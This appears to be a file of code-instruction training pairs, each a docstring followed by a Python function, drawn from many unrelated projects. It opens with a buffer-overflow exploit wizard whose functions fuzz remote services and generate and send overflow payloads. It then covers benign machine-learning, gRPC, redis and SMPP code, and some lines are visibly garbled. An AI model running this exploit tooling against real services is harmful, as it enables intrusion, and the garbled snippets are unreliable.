+ print_error('Connection failed')
+ return
+ try:
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ print_info('Sending evil request with {} bytes'.format(len(buffer)))
+ s.send(buffer)
+ print_success('Done')
+ except so.timeout:
+ print_error('Connection failed due to socket timeout')
+ except (BrokenPipeError, ConnectionResetError):
+ print_error('The connection was closed while sending the payload')
+[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_fuzzing():
+ show_prompt_text('You can check and run the fuzzing file manually or press Enter to let the wizard run it.')
+ show_prompt_text('Enter "skip" to proceed without running the file.', False)
+ if get_input(check_text) == 'skip':
+ return
+ else:
+ send_fuzzing()
+ print_info('Fuzzing finished')
+[INST] Sends requests with increasing payloads to cause a remote buffer overflow. [/INST] def send_fuzzing():
+ build_fuzz_buffer()
+ try:
+ for item in fuzz_buffer:
+ with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
+ s.settimeout(5)
+ print_info('Connecting to ' + target)
+ connect = s.connect_ex((target, port))
+ if connect != 0:
+ print_error('Connection failed')
+ return
+ try:
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ command = start_command + item + end_command
+ print_info('Fuzzing with {} bytes'.format(len(command)))
+ s.send(command)
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ print_success('Done')
+ except so.timeout:
+ print_error('Connection failed due to socket timeout.')
+ return
+ except (BrokenPipeError, ConnectionResetError):
+ print_error('The connection was closed while sending the payload')
+[INST] Creates a file with the payload for a local buffer overflow. [/INST] def dump_local_exploit():
+ global file
+ global buffer
+ try:
+ with open(file, 'wb') as f:
+ f.write(buffer)
+ print_success('Created / modified file with length {}'.format(len(buffer)))
+ except OSError as ex:
+ print_error('Error while creating the exploit file:\n {}'.format(ex.strerror))
+[INST] Writes a python file with the exploit based on the currently set parameters. [/INST] def dump_remote_exploit():
+ global file
+ content = """\
+#!/usr/bin/python3
+import socket as so
+# --- Define target ------------------------
+target = '{target}'
+port = {port}
+# ------------------------------------------
+# --- Define exploit ------------------------
+buf_length = {buffer_length}
+offset = {off}
+{buffer_code}
+# ------------------------------------------
+with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
+ try:
+ s.settimeout(5)
+ print(' [*] Connecting to', target)
+ connect = s.connect_ex((target, port))
+ # Stop script if connection cannot be established
+ if connect != 0:
+ print('[!] Connection failed')
+ exit(1)
+ # Connection established: send request
+ try:
+ # Catch initial response if any
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ print(' [*] Sending evil request with', len(buffer), 'bytes')
+ s.send(buffer)
+ print('[*] Done')
+ # Stop on timeout
+ except so.timeout:
+ print('[!] Connection failed due to socket timeout.')
+ exit(1)
+ except (BrokenPipeError, ConnectionResetError):
+ print('[!] The connection was closed while sending the payload')
+""".format(target=target,
+ port=port,
+ buffer_length=buf_length,
+ off=offset,
+ buffer_code=buffer_list.selected_buffer.print_buffer())
+ try:
+ with open(file, 'wb') as f:
+ f.write(content.encode())
+ print_success('Created exploit file {}'.format(file))
+ except OSError as ex:
+ print_error('Error while creating the exploit file:\n {}'.format(ex.strerror))
+[INST] Updates only the buffer in an existing exploit file.
+Manual changes in other parts of the file will be retained.. [/INST] def update_remote_exploit():
+ try:
+ with FileInput(files=[file], inplace=True) as f:
+ for line in f:
+ line = line.rstrip()
+ if line.startswith('offset = '):
+ line = "offset = " + str(offset)
+ elif line.startswith('buffer = '):
+ line = buffer_list.selected_buffer.print_buffer()
+ elif line.startswith('buffer += ') or len(line) == 0:
+ continue
+ print(line)
+ print_success('Updated buffer in exploit file {}'.format(file))
+ except OSError as ex:
+ print_error('Error while updating the exploit file:\n {}'.format(ex.strerror))
+[INST] Generates the buffer for fuzzing based on the currently set parameters for
+fuzz_length, fuzz_increase and fuzz_char. [/INST] def build_fuzz_buffer():
+ counter = increase_step - len(start_command) - len(end_command)
+ while len(fuzz_buffer) <= fuzz_buff_length:
+ fuzz_buffer.append(fuzz_char * counter)
+ counter = counter + increase_step
+[INST] Writes files with increasing size for fuzzing. [/INST] def dump_local_fuzz():
+ build_fuzz_buffer()
+ for item in fuzz_buffer:
+ filename = file_name + '_' + str(len(item)) + '.' + file_ext
+ with open(filename, 'wb') as f:
+ f.write(start_command + item + end_command)
+ print_info('Created fuzzing file with length ' + str(len(item)))
+[INST] Writes a python file for fuzzing based on the currently set parameters for fuzz_length, fuzz_increase and fuzz_char. [/INST] def dump_remote_fuzz():
+ filename = 'fuzzing.py'
+ content = '''\
+#!/usr/bin/python3
+import socket as so
+# --- Define target ------------------------
+target = '{target}'
+port = {port}
+# ------------------------------------------
+# --- Build fuzzing buffer -----------------
+fuzz_buffer = []
+counter = {step} - len({cmd}) - len({ecmd})
+while len(fuzz_buffer) <= {buff_len}:
+ fuzz_buffer.append({char}*counter)
+ counter = counter + {step}
+# ------------------------------------------
+for item in fuzz_buffer:
+ with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
+ try:
+ s.settimeout(5)
+ print(' [*] Connecting to', target)
+ connect = s.connect_ex((target, port))
+ # Stop script if connection cannot be established
+ if connect != 0:
+ print('[!] Connection failed')
+ exit(1)
+ # Connection established: send request
+ try:
+ # Catch initial response if any
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ command = {cmd} + item + {ecmd}
+ print(' [*] Fuzzing with', len(command), 'bytes')
+ s.send(command)
+ try:
+ print('[*] Received response: ' + str(s.recv(1024)))
+ except so.timeout:
+ pass
+ print('[*] Done')
+ # Stop on timeout
+ except so.timeout:
+ print('[!] Connection failed due to socket timeout.')
+ exit(1)
+ except (BrokenPipeError, ConnectionResetError):
+ print('[!] The connection was closed while sending the payload')
+ exit(1)
+'''.format(target=target,
+ port=port,
+ step=increase_step,
+ buff_len=fuzz_buff_length,
+ char=fuzz_char,
+ cmd=start_command,
+ ecmd=end_command)
+ try:
+ with open(filename, 'w') as f:
+ f.write(content)
+ print_success('Created fuzzing file {}'.format(filename))
+ except OSError as ex:
+ print_error('Error while creating the fuzzing file:\n {}'.format(ex.strerror))
+[INST] Prints ingredients for making `count` arepas.
+F-string of original code. [/INST] def ingredients(count):
+ print(f'{count*0.1} cups arepa flour')
+ print(f'{count*0.1} cups cheese')
+ print(f'{count*0.025} cups water')
+[INST] Train the word2vec model for document vector representation.. [/INST] def fit(self, X, y=None):
+ self.sentences = X
+ self.word2vec = gensim.models.Word2Vec(MySentences(self.sentences), *self.args, **self.kwargs)
+ self.model = dict(zip(self.word2vec.wv.index2word, self.word2vec.wv.vectors))
+ tfidf = TfidfVectorizer(analyzer=lambda x: x)
+ tfidf.fit(X)
+ max_idf = max(tfidf.idf_)
+ self.word2weight = defaultdict(
+ lambda: max_idf,
+ [(w, tfidf.idf_[i]) for w, i in tfidf.vocabulary_.items()]
+ )
+ return self
+[INST] Transform a sequence of documents to vectors.. [/INST] def transform(self, X, y=None):
+ return np.array([
+ np.mean([self.model[w] * self.word2weight[w]
+ for w in words if w in self.model] or
+ [np.random.rand(self.size)], axis=0)
+ for words in MySentences(X)
+ ])
+[INST] Combine `fit` and `transform` functions.
+It trains the model on the given data then transforming
+and returning the training data into vectors.. [/INST] def fit_transform(self, X, y=None):
+ temp = self.fit(X)
+ return temp.transform(X)
+[INST] Treats gRPC inputs and assembles lua command. Specifically, checks if required field have been specified,
+if the values and types are correct and, for each input/input_type adds the argument to the lua command.. [/INST] def treat_inputs(self, request, arguments, created_images):
+ model_path = self.model_dir
+ file_index_str = ""
+ image_path = ""
+ for field, values in arguments.items():
+ default = values[2]
+ try:
+ arg_value = eval("request.{}".format(field))
+ except Exception as e:
+ log.error(e)
+ return False
+ print("Received request.{} = ".format(field))
+ print(arg_value)
+ if field == "input":
+ log.debug("Treating input image field.")
+ assert(request.input != ""), "Input image field should not be empty."
+ try:
+ image_path, file_index_str = \
+ service.treat_image_input(arg_value, self.input_dir, "{}".format(field))
+ print("Image path: {}".format(image_path))
+ created_images.append(image_path)
+ except Exception as e:
+ log.error(e)
+ raise
+ elif field == "model":
+ log.debug("Treating model field. Forcing model to be ESRGAN.")
+ model_path += self.esrgan_model
+ elif field == "scale":
+ log.debug("Treating scale field. Forcing scale to be 4.")
+ scale = 4
+ model_path += str(scale)
+ else:
+ log.error("Request field not found.")
+ return False
+ if image_path == "":
+ log.error("Empty image_path (filename). Something went wrong when treating input.")
+ model_path += self.model_suffix
+ log.debug("Successfully treated input.")
+ return image_path, model_path, file_index_str
+[INST] Increases the resolution of a given image (request.image). [/INST] def increase_image_resolution(self, request, context):
+ created_images = []
+ arguments = {"input": ("image", True, None),
+ "model": ("string", True, None),
+ "scale": ("int", False, 4)}
+ try:
+ image_path, model_path, file_index_str = self.treat_inputs(request, arguments, created_images)
+ except HTTPError as e:
+ error_message = "Error downloading the input image \n" + e.read()
+ log.error(error_message)
+ self.result.data = error_message
+ return self.result
+ except Exception as e:
+ log.error(e)
+ self.result.data = e
+ return self.result
+ log.debug("Treated input.")
+ with Pool(1) as p:
+ try:
+ output = p.apply(_increase_image_resolution, (model_path, image_path))
+ except Exception as e:
+ log.error(e)
+ self.result.data = e
+ return self.result
+ log.debug("Returning on service complete!")
+ input_filename = os.path.split(created_images[0])[1]
+ log.debug("Input file name: {}".format(input_filename))
+ output_image_path = self.output_dir + '/' + input_filename
+ log.debug("Output image path: {}".format(output_image_path))
+ try:
+ cv2.imwrite(output_image_path, output)
+ created_images.append(output_image_path)
+ except Exception as e:
+ log.error("Error writing output image to file.")
+ log.error(e)
+ self.result.data = e
+ return self.result
+ if input_filename.split('.')[1] == 'png':
+ log.debug("Encoding from PNG.")
+ self.result.data = service.png_to_base64(output_image_path).decode("utf-8")
+ else:
+ log.debug("Encoding from JPG.")
+ self.result.data = service.jpg_to_base64(output_image_path, open_file=True).decode("utf-8")
+ log.debug("Output image generated. Service successfully completed.")
+ for image in created_images:
+ service.serviceUtils.clear_file(image)
+ return self.result
+[INST] The gRPC serve function.
+Params:
+max_workers: pool of threads to execute calls asynchronously
+port: gRPC server port
+
+Add all your classes to the server here.
+(from generated .py files by protobuf compiler). [/INST] def serve(max_workers=5, port=7777):
+ server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
+ grpc_bt_grpc.add_SuperResolutionServicer_to_server(
+ SuperResolutionServicer(), server)
+ server.add_insecure_port('[::]:{}'.format(port))
+ log.debug("Returning server!")
+ return server
+[INST] Load the PyTorch model from the `model_dir` directory.. [/INST] def model_fn(model_dir):
+ print("Loading model.")
+ model_info = {}
+ model_info_path = os.path.join(model_dir, 'model_info.pth')
+ with open(model_info_path, 'rb') as f:
+ model_info = torch.load(f)
+ print("model_info: {}".format(model_info))
+ device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
+ INPUT_DIM = model_info['INPUT_DIM']
+ WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM']
+ N_FILTERS = model_info['N_FILTERS']
+ FILTER_SIZES = model_info['FILTER_SIZES']
+ AUTHOR_DIM = model_info['AUTHOR_DIM']
+ DROPOUT = model_info['DROPOUT']
+ PAD_IDX = model_info['PAD_IDX']
+ model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, \
+ AUTHOR_DIM, DROPOUT, PAD_IDX)
+ model_path = os.path.join(model_dir, 'model_state.pt')
+ with open(model_path, 'rb') as f:
+ model.load_state_dict(torch.load(f))
+ word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
+ with open(word_dict_path, 'rb') as f:
+ model.word_dict = pickle.load(f)
+ model.to(device).eval()
+ print("Done loading model.")
+ return model, model_info['TRAIN_HISTORY']
+[INST] Load the PyTorch model from the `model_dir` directory.. [/INST] def model_fn(model_dir):
+ print("Loading model.")
+ model_info = {}
+ model_info_path = os.path.join(model_dir, 'model_info.pth')
+ with open(model_info_path, 'rb') as f:
+ model_info = torch.load(f)
+ print("model_info: {}".format(model_info))
+ device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
+ INPUT_DIM = model_info['INPUT_DIM']
+ WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM']
+ N_FILTERS = model_info['N_FILTERS']
+ FILTER_SIZES = model_info['FILTER_SIZES']
+ AUTHOR_DIM = model_info['AUTHOR_DIM']
+ DROPOUT = model_info['DROPOUT']
+ PAD_IDX = model_info['PAD_IDX']
+ model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, AUTHOR_DIM, DROPOUT, PAD_IDX)
+ print("Model loaded with embedding_dim {}, vocab_size {}.".format(
+ WORD_EMBEDDING_DIM, INPUT_DIM))
+ model_path = os.path.join(model_dir, 'model_state.pt')
+ with open(model_path, 'rb') as f:
+ model.load_state_dict(torch.load(f))
+ word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
+ with open(word_dict_path, 'rb') as f:
+ model.word_dict = pickle.load(f)
+ model.to(device).eval()
+ print("Done loading model.")
+ return model
+[INST] ls list to be cut/padded to length n. [/INST] def pad_to_n(ls, n = FIX_WORD_LENGTH):
+ ls= ls[:n]
+ if len(ls)']*(n-len(ls))) + ls
+ return ls
+[INST] Gets wordlend of a poem,
+if larger than SPLIT_INTO partions into next paragraph
+return author, title and poem broken in this way. [/INST] def poem_fragments(poem_series, split_into):
+ poem = poem_series
+ poem_author = poem.author
+ poem_title = poem.title
+ poem_content = poem.content
+ poem_pa= poem.content.split('.\n')
+ i=0
+ while ((i+1)!=(len(poem_pa))):
+ if (len(poem_pa[i].split())>=split_into):
+ poem_pa[i]=poem_pa[i]+'.\n'
+ i+=1
+ else:
+ poem_pa[i] = poem_pa[i]+'.\n'+poem_pa[i+1]
+ del poem_pa[i+1]
+ return (poem_author, poem_title ,poem_pa)
+[INST] ls list to be cut/padded to length n. [/INST] def slice_and_pad_to_n(ls, n):
+ ls= ls[:n]
+ if len(ls)']*(n-len(ls))) + ls
+ return ls
+[INST] List to tockens
+word_dict: dictionary of tokens
+token_list: word list. [/INST] def tokenize_poem(token_list, word_dict):
+ aux =[word_dict[w] if w in word_dict else word_dict[''] for w in token_list]
+ return aux
+[INST] poem extract as list
+word_length: final word length of poems
+token_dict: tokens dictionary
+tokenized_poems: tokenized poems. [/INST] def tokenize_pad_slice_poems(data, word_length, word_dict):
+ data = [slice_and_pad_to_n(p, word_length) for p in data]
+ tokenized_poems = [tokenize_poem(p ,word_dict) for p in data]
+ return tokenized_poems
+[INST] data : poems list created by spacy and torchtext
+word_length: fix poems to have this number of tokens (not only words)
+data_dir: dir to store data_dir
+file_name: file name to store data. [/INST] def process_and_save(data, word_length, word_dict, data_dir, file_name):
+ data_list = [i.content for i in data.examples]
+ labels_list = [i.author_label for i in data.examples]
+ poems_list = tokenize_pad_slice_poems(data_list, word_length, word_dict)
+ path_to_file = os.path.join(data_dir, file_name)
+ with open(path_to_file, 'wb') as f:
+ pickle.dump((poems_list,labels_list), f)
+[INST] Visualizes coordinates in dataframe on map
+Retrieves columns with name latitude and logitude and visualizes it on a map.. [/INST] def visualize_coordinates(df: pd.DataFrame, latitude: str, longitude: str) -> None :
+ fig = px.scatter_mapbox(df, lat=latitude, lon=longitude,
+ color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10,
+ mapbox_style="carto-positron")
+ fig.show()
+[INST] Fetches the data for a city if the data is not yet cashed on the computer.. [/INST] def fetch_data_city(city: str) -> None:
+ compression = ".xz"
+ folder = os.path.join(".","data")
+ def file_path(file_name: str) -> str:
+ return os.path.join(folder, file_name)
+ if not(os.path.exists(folder)):
+ os.mkdir(folder)
+ tiles_path = file_path(f'{city}Tiles.pkl{compression}')
+ hourly_dem_path = file_path(f'{city}HourlyDemographics.pkl{compression}')
+ hourly_density_path = file_path(f'{city}HourlyDensity.pkl{compression}')
+ daily_density_path = file_path(f'{city}DensityDaily.pkl{compression}')
+ daily_demographics_path = file_path(f'{city}DemographicsDaily.pkl{compression}')
+ if not(os.path.isfile(tiles_path)):
+ tiles = get_tiles(get_municipalityID(city)[0])
+ tiles.to_pickle(tiles_path)
+ else:
+ tiles = pd.read_pickle(tiles_path)
+ if not(os.path.isfile(hourly_dem_path)):
+ hourly_dem = get_hourly_demographics_dataframe(tiles['tileID'].to_numpy())
+ hourly_dem.to_pickle(hourly_dem_path)
+ if not(os.path.isfile(hourly_density_path)):
+ hourly_dens = get_hourly_density_dataframe(tiles['tileID'].to_numpy())
+ hourly_dens.to_pickle(hourly_density_path)
+ if not(os.path.isfile(daily_density_path)):
+ get_daily_density(tiles['tileID'].to_numpy()).to_pickle(daily_density_path)
+ if not(os.path.isfile(daily_demographics_path)):
+ get_daily_demographics(tiles['tileID'].to_numpy()).to_pickle(daily_demographics_path)
+[INST] Cleans the list of cities by removing all the cities that are not found in the
+official list of cities provided by the Federal Statisitics Office.
+
+List of cities to check and clean.
+
+List containing a subset of the input list such that all elements are valid.. [/INST] def clean_cities_list(cities: [str]) -> [str]:
+ invalid_cities = []
+ for c in cities:
+ if len(commune.loc[commune.GDENAME == c].GDENR.to_numpy()) == 0:
+ city = []
+ sim_value = []
+ for f in commune.GDENAME:
+ r = SequenceMatcher(None, c, f).ratio()
+ if r > 0.5:
+ city.append(f)
+ sim_value.append(r)
+ d = pd.DataFrame(data={"city": city, "value": sim_value})
+ potential_cities = d.sort_values("value", ascending=False).head(5).city.to_numpy()
+ print(f"City nammed: {c} cannot be found in official records. Did you mean: {potential_cities} ? {c} will be ignored.")
+ invalid_cities.append(c)
+ return [c for c in cities if not(c in invalid_cities)]
+[INST] Downloads the excel spreadsheet from the Swiss Federal Statistical Office that maps the town name to unique ID. [/INST] def download_commune_excel() -> None:
+ print('Beginning commune file download with requests')
+ folder = os.path.join(".","data")
+ if not(os.path.exists(folder)):
+ os.mkdir(folder)
+ url = 'https://www.bfs.admin.ch/bfsstatic/dam/assets/11467406/master'
+ r = requests.get(url)
+ with open(os.path.join(".", "data", 'commune.xlsx'), 'wb') as f:
+ f.write(r.content)
+ print("End of commune file download")
+[INST] Assert that a redis operation returns the expected result.. [/INST] def assert_redis_op(self, redis, expected, op, *args, **kw):
+ raise NotImplementedError(".assert_redis_op() method not implemented.")
+[INST] Assert that a redis operation raises an exception.. [/INST] def assert_redis_error(self, redis, op, *args, **kw):
+ raise NotImplementedError(
+ ".assert_redis_error() method not implemented.")
+[INST] Wait some number of seconds, either for real or by advancing a clock.. [/INST] def wait(self, delay):
+ raise NotImplementedError(".wait() method not implemented.")
+[INST] Perform an operation on both the fake and real Redises and assert that
+the responses and errors are the same.
+
+This method is a generator and is not used directly. It's wrapped
+with an appropriate sync/async wrapper in __init__() above.. [/INST] def _perform_operation_gen(self, op, *args, **kw):
+ results = []
+ errors = []
+ for redis in [self._fake_redis, self._real_redis]:
+ try:
+ result = yield getattr(redis, op)(*args, **kw)
+ except Exception as e:
+ errors.append(e)
+ if results != []:
+ self._test_case.fail(
+ "Fake redis returned %r but real redis raised %r" % (
+ results[0], errors[0]))
+ else:
+ results.append(result)
+ if errors != []:
+ self._test_case.fail(
+ "Real redis returned %r but fake redis raised %r" % (
+ results[0], errors[0]))
+ if errors:
+ fake_type, real_type = type(errors[0]), type(errors[1])
+ if real_type is self._real_redis.RESPONSE_ERROR:
+ real_type = self._fake_redis.RESPONSE_ERROR
+ self._test_case.assertEqual(
+ fake_type, real_type,
+ ("Fake redis (a) and real redis (b) errors different:"
+ "\n a = %r\n b = %r") % tuple(errors))
+ raise errors[0]
+ self._test_case.assertEqual(
+ results[0], results[1],
+ "Fake redis (a) and real redis (b) responses different:"
+ "\n a = %r\n b = %r" % tuple(results))
+ returnValue(results[0])
+[INST] Check if this might be a delivery report with optional PDU parameters.. [/INST] def _handle_delivery_report_optional_params(self, pdu):
+ pdu_opts = unpacked_pdu_opts(pdu)
+ receipted_message_id = pdu_opts.get('receipted_message_id', None)
+ message_state = pdu_opts.get('message_state', None)
+ if receipted_message_id is None or message_state is None:
+ return succeed(False)
+ status = self.STATUS_MAP.get(message_state, 'UNKNOWN')
+ d = self.transport.handle_delivery_report(
+ receipted_message_id=receipted_message_id,
+ delivery_status=self.delivery_status(status),
+ smpp_delivery_status=status)
+ d.addCallback(lambda _: True)
+ return d
+[INST] Construct and dispatch a delivery report based on content fields as
+matched by our regex.. [/INST] def _process_delivery_report_content_fields(self, content_fields):
+ receipted_message_id = content_fields['id']
+ message_state = content_fields['stat']
+ return self.transport.handle_delivery_report(
+ receipted_message_id=receipted_message_id,
+ delivery_status=self.delivery_status(message_state),
+ smpp_delivery_status=message_state)
+[INST] Check if the ``esm_class`` indicates that this is a delivery report.
+
+We assume the message content is a string that matches our regex.
+We can't use the usual decoding process here because it lives
+elsewhere and the content should be plain ASCII generated by the
+SMSC anyway.. [/INST] def _handle_delivery_report_esm_class(self, pdu):
+ if not self.config.delivery_report_use_esm_class:
+ return succeed(False)
+ esm_class = pdu["body"]["mandatory_parameters"]["esm_class"]
+ if not (esm_class & self.ESM_CLASS_MASK):
+ return succeed(False)
+ content = pdu["body"]["mandatory_parameters"]["short_message"]
+ match = self.config.delivery_report_regex.search(content or '')
+ if not match:
+ self.log.warning(
+ ("esm_class %s indicates delivery report, but content"
+ " does not match regex: %r") % (esm_class, content))
+ return succeed(True)
+ fields = match.groupdict()
+ d = self._process_delivery_report_content_fields(fields)
+ d.addCallback(lambda _: True)
+ return d
+[INST] Call the appropriate `submit_*` method depending on config.. [/INST] def send_short_message(self, service, vumi_message_id, destination_addr,
+ content, data_coding=0, source_addr='',
+ optional_parameters=None):
+ kwargs = dict(
+ vumi_message_id=vumi_message_id,
+ destination_addr=destination_addr,
+ short_message=content,
+ data_coding=data_coding,
+ source_addr=source_addr,
+ optional_parameters=optional_parameters)
+ if self.config.send_long_messages:
+ kwargs['long_message'] = kwargs.pop('short_message')
+ return service.submit_sm_long(**kwargs)
+ elif self.config.send_multipart_sar:
+ kwargs['reference_rollover'] = (
+ self.config.multipart_sar_reference_rollover)
+ return service.submit_csm_sar(**kwargs)
+ elif self.config.send_multipart_udh:
+ return service.submit_csm_udh(**kwargs)
+ return service.submit_sm(**kwargs)
+[INST] Decorate a method that calls a manager.
+This redecorates with the `call_decorator` attribute on the Manager
+subclass used, which should be either @inlineCallbacks or
+@flatten_generator.. [/INST] def calls_manager(manager_attr):
+ if callable(manager_attr):
+ return Manager.calls_manager('manager')(manager_attr)
+ def redecorate(func):
+ @wraps(func)
+ def wrapper(self, *args, **kw):
+ manager = getattr(self, manager_attr)
+ return manager.call_decorator(func)(self, *args, **kw)
+ return wrapper
+ return redecorate
+[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config):
+ client_config = config.copy()
+ manager_config = {
+ 'config': config.copy(),
+ 'key_prefix': client_config.pop('key_prefix', None),
+ 'key_separator': client_config.pop('key_separator', ':'),
+ }
+ fake_redis = client_config.pop('FAKE_REDIS', None)
+ if 'VUMITEST_REDIS_DB' in os.environ:
+ fake_redis = None
+ client_config['db'] = int(os.environ['VUMITEST_REDIS_DB'])
+ if fake_redis is not None:
+ if isinstance(fake_redis, cls):
+ fake_redis = fake_redis._client
+ if isinstance(fake_redis, FakeRedis):
+ pass
+ else:
+ fake_redis = None
+ return cls._fake_manager(fake_redis, manager_config)
+ return cls._manager_from_config(client_config, manager_config)
+[INST] Construct a client from a dictionary of options.. [/INST] def _manager_from_config(cls, client_config, manager_config):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " ._manager_from_config(...)")
+[INST] Delete *ALL* keys whose names start with this manager's key prefix.
+Use only in tests.. [/INST] def _purge_all(self):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " ._purge_all()")
+[INST] Make a redis API call using the underlying client library.. [/INST] def _make_redis_call(self, call, *args, **kw):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " ._make_redis_call()")
+[INST] Filter results of a redis call.. [/INST] def _filter_redis_results(self, func, results):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " ._filter_redis_results()")
+[INST] Generate a key using this manager's key prefix. [/INST] def _key(self, key):
+ if self._key_prefix is None:
+ return key
+ return "%s%s%s" % (self._key_prefix, self._key_separator, key)
+[INST] Strip off manager's key prefix from a key. [/INST] def _unkey(self, key):
+ prefix = "%s%s" % (self._key_prefix, self._key_separator)
+ if key.startswith(prefix):
+ return key[len(prefix):]
+ return key
+[INST] Return the result with some fake delay. If we're in async mode, add
+some real delay to catch code that doesn't properly wait for the
+deferred to fire.. [/INST] def _delay_operation(self, func, args, kw):
+ self.clock.advance(0.1)
+ if self._is_async:
+ d = Deferred()
+ delayed = reactor.callLater(
+ FAKE_REDIS_WAIT, call_to_deferred, d, func, self, *args, **kw)
+ self._delayed_calls.append(delayed)
+ return d
+ else:
+ return func(self, *args, **kw)
+[INST] Sort keys in a consistent but non-obvious way.
+We sort by the crc32 of the key, that being cheap and good enough for
+our purposes here.. [/INST] def _sort_keys_by_hash(self, keys):
+ return sorted(keys, key=crc32)
+[INST] Turn a vumi_date-formatted string into a string that sorts in reverse order
+and can be turned back into a timestamp later.
+
+This is done by converting to a unix timestamp and subtracting it from
+0xffffffffff (2**40 - 1) to get a number well outside the range
+representable by the datetime module. The result is returned as a
+hexadecimal string.. [/INST] def to_reverse_timestamp(vumi_timestamp):
+ timestamp = timegm(parse_vumi_date(vumi_timestamp).timetuple())
+ return "%X" % (0xffffffffff - timestamp)
+[INST] Add a key and timestamp to the manager.. [/INST] def add_key(self, key, timestamp):
+ if timestamp > self.start_timestamp:
+ self.new_keys.append((key, timestamp))
+ return None
+ self.cache_keys.append((key, timestamp))
+ if len(self.cache_keys) > self.key_count:
+ return self.cache_keys.pop(0)
+ return None
+[INST] Check if a batch_id's cache values need to be reconciled with
+what's stored in the MessageStore.. [/INST] def needs_reconciliation(self, batch_id, delta=0.01):
+ inbound = float((yield self.batch_inbound_count(batch_id)))
+ cached_inbound = yield self.cache.count_inbound_message_keys(
+ batch_id)
+ if inbound and (abs(cached_inbound - inbound) / inbound) > delta:
+ returnValue(True)
+ outbound = float((yield self.batch_outbound_count(batch_id)))
+ cached_outbound = yield self.cache.count_outbound_message_keys(
+ batch_id)
+ if outbound and (abs(cached_outbound - outbound) / outbound) > delta:
+ returnValue(True)
+ returnValue(False)
+[INST] Rebuild the cache for the given batch.
+The ``start_timestamp`` parameter is used for testing only.. [/INST] def reconcile_cache(self, batch_id, start_timestamp=None):
+ if start_timestamp is None:
+ start_timestamp = format_vumi_date(datetime.utcnow())
+ yield self.cache.clear_batch(batch_id)
+ yield self.cache.batch_start(batch_id)
+ yield self.reconcile_outbound_cache(batch_id, start_timestamp)
+ yield self.reconcile_inbound_cache(batch_id, start_timestamp)
+[INST] Rebuild the inbound message cache.. [/INST] def reconcile_inbound_cache(self, batch_id, start_timestamp):
+ key_manager = ReconKeyManager(
+ start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT)
+ key_count = 0
+ index_page = yield self.batch_inbound_keys_with_addresses(batch_id)
+ while index_page is not None:
+ for key, timestamp, addr in index_page:
+ yield self.cache.add_from_addr(batch_id, addr)
+ old_key = key_manager.add_key(key, timestamp)
+ if old_key is not None:
+ key_count += 1
+ index_page = yield index_page.next_page()
+ yield self.cache.add_inbound_message_count(batch_id, key_count)
+ for key, timestamp in key_manager:
+ try:
+ yield self.cache.add_inbound_message_key(
+ batch_id, key, self.cache.get_timestamp(timestamp))
+ except:
+ log.err()
+[INST] Rebuild the outbound message cache.. [/INST] def reconcile_outbound_cache(self, batch_id, start_timestamp):
+ key_manager = ReconKeyManager(
+ start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT)
+ key_count = 0
+ status_counts = defaultdict(int)
+ index_page = yield self.batch_outbound_keys_with_addresses(batch_id)
+ while index_page is not None:
+ for key, timestamp, addr in index_page:
+ yield self.cache.add_to_addr(batch_id, addr)
+ old_key = key_manager.add_key(key, timestamp)
+ if old_key is not None:
+ key_count += 1
+ sc = yield self.get_event_counts(old_key[0])
+ for status, count in sc.iteritems():
+ status_counts[status] += count
+ index_page = yield index_page.next_page()
+ yield self.cache.add_outbound_message_count(batch_id, key_count)
+ for status, count in status_counts.iteritems():
+ yield self.cache.add_event_count(batch_id, status, count)
+ for key, timestamp in key_manager:
+ try:
+ yield self.cache.add_outbound_message_key(
+ batch_id, key, self.cache.get_timestamp(timestamp))
+ yield self.reconcile_event_cache(batch_id, key)
+ except:
+ log.err()
+[INST] Update the event cache for a particular message.. [/INST] def reconcile_event_cache(self, batch_id, message_id):
+ event_keys = yield self.message_event_keys(message_id)
+ for event_key in event_keys:
+ event = yield self.get_event(event_key)
+ yield self.cache.add_event(batch_id, event)
+[INST] Has the message search issue a `batch_inbound_keys_matching()`
+query and stores the resulting keys in the cache ordered by
+descending timestamp.. [/INST] def find_inbound_keys_matching(self, batch_id, query, ttl=None,
+ wait=False):
+ assert isinstance(self.manager, TxRiakManager), (
+ "manager is not an instance of TxRiakManager")
+ token = yield self.cache.start_query(batch_id, 'inbound', query)
+ deferred = self.batch_inbound_keys_matching(batch_id, query)
+ deferred.addCallback(
+ lambda keys: self.cache.store_query_results(batch_id, token, keys,
+ 'inbound', ttl))
+ if wait:
+ yield deferred
+ returnValue(token)
+[INST] Has the message search issue a `batch_outbound_keys_matching()`
+query and stores the resulting keys in the cache ordered by
+descending timestamp.. [/INST] def find_outbound_keys_matching(self, batch_id, query, ttl=None,
+ wait=False):
+ token = yield self.cache.start_query(batch_id, 'outbound', query)
+ deferred = self.batch_outbound_keys_matching(batch_id, query)
+ deferred.addCallback(
+ lambda keys: self.cache.store_query_results(batch_id, token, keys,
+ 'outbound', ttl))
+ if wait:
